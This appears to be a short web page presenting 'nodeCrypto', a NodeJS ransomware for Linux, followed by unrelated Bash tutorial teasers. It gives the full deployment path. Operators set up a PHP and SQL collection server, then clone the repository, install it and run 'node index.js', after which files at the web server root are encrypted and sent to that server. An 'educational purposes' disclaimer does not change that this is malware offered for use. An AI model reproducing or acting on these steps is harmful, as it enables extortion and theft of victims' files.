nodeCrypto is a Linux Ransomware written in NodeJs that encrypt predefined files. This project was created for educational purposes, you are the sole responsible for the use of nodeCrypto.
Install server
Upload all file of server/ folder on your webserver.
Create a sql database and import sql/nodeCrypto.sql
Edit server/libs/db.php and add your SQL ID.
Also Read : SALT – SLUB ALlocator Tracer for the Linux Kernel
Install and run
git clone https://github.com/atmoner/nodeCrypto.git
cd nodeCrypto && npm install
You must edit first variable in index.js
Once your configuration is complete, you can start the ransomware.
node index.js
The files at the root of the web server will encrypt and send to the server.
To Do
What Are Bash Comments? In Bash scripting, comments are notes in your code that the…
When you write a Bash script in Linux, you want it to run correctly every…
Introduction If you’re new to Bash scripting, one of the first skills you’ll need is…
What is Bash Scripting? Bash scripting allows you to save multiple Linux commands in a file and…
When it comes to automating tasks on Linux, Bash scripting is an essential skill for both beginners…
Learn how to create and use Bash functions with this complete tutorial. Includes syntax, arguments,…